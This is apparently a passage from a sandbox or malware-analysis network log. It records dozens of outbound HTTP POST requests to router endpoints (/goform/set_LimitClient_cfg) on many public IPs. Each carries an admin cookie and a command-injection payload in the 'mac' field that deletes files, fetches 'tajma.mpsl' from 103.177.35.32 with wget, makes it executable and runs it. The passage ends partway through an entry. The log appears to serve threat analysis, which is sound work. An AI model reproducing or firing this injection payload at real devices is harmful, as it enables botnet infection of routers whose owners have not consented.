                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2700192.168.2.235790469.49.110.438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476125956 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2701192.168.2.235851299.185.170.168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476140976 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2702192.168.2.234826479.165.144.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476159096 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2703192.168.2.234140812.8.196.448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476190090 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2704192.168.2.2333008189.226.111.38080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476191044 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2705192.168.2.2334434189.121.7.2148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476202011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2706192.168.2.2355506190.172.107.2478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476226091 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2707192.168.2.2349794165.196.16.958080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476262093 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2708192.168.2.233779853.146.22.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476269960 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2709192.168.2.2337802190.155.68.1938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476278067 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2710192.168.2.2346752119.182.252.2078080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476310968 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2711192.168.2.2358060101.155.77.1058080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476330042 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2712192.168.2.234137899.45.55.2228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476330042 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2713192.168.2.2346352173.5.112.1638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476588011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2714192.168.2.235113068.139.182.858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476608038 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2715192.168.2.235586640.165.120.1198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476630926 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2716192.168.2.234206287.58.140.2038080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476667881 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2717192.168.2.2357384188.1.68.78080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476667881 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2718192.168.2.2357248201.69.98.108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476690054 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2719192.168.2.2348898126.251.23.2388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476705074 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2720192.168.2.2356874183.206.33.538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476726055 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2721192.168.2.2341096133.98.56.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476741076 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2722192.168.2.233306652.34.42.428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476754904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
